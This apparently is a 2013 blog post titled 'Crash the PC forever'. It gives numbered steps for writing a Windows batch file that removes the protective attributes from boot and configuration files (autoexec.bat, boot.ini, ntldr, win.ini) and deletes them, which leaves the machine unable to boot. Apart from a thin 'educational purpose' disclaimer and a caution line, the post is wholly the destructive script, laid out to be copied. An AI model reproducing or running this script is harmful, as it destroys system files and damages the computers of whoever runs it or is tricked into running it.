Saturday, March 23, 2013

Crash the PC forever.

Crash the pc FOREVER

I am not responsible for anything. This is only for educational purpose

1. Open notepad.
2. Enter the following code in the notepad:
    @echo off 
        attrib -r -s -h c:\autoexec.bat 
        del c:\autoexec.bat 
        attrib -r -s -h c:\boot.ini 
        del c:\boot.ini 
        attrib -r -s -h c:\ntldr 
        del c:\ntldr 
        attrib -r -s -h c:\windows\win.ini 
        del c:\windows\win.ini
3. Save it as anything.bat ,remember it must be a .bat file.
(Caution:This file will crash your pc forever)

1 comment: